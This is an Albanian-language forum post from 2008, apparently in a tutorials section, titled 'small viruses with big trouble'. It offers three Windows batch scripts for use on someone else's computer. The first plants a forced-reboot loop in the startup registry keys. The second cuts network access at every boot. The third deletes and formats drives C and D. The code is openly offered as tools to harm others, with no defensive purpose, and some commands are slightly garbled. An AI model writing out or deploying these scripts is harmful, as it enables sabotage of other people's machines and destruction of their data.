Kosova-Crew
 
ForumPortaliPytësoriLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Virusa te vogel me Sherr te MAdh

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë 
AutoriMesazh
dj_cobr4
S.Moderator
S.Moderator
avatar

Numri i postimeve : 289
Registration date : 28/10/2008

MesazhTitulli: Virusa te vogel me Sherr te MAdh   Tue Oct 28, 2008 2:24 pm

Ndaleni PC

echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo everready Strikes Again
PAUSE
Bene Disable RRjetin e Dikuj

echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo everready Strikes Again


Formetizoje Harddiskun e dikuj

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Virusa te vogel me Sherr te MAdh
Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Gjergj Kastrioti - Skënderbeu, prijësi dhe heroi më i madh në histori
» Gani Qarri: Ismail Kadare - Në përkujtim të 75 vjetorit të lindjes së Shkrimtarit
» Asllan Dibrani:Nga gjiri i Malësisë së Gollakut , lindi këngëtari dhe krijuesi i madh Demir Krasniqi!
» TURNIR NË FUTBOLL TË VOGËL - Nyon - Zvicër
» Mbi një “Tregim të Madh”

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Mir Se Vini Ne Kosova-Crew :: Internet&Hardware :: E-Books&Tutorials-
Kërce tek: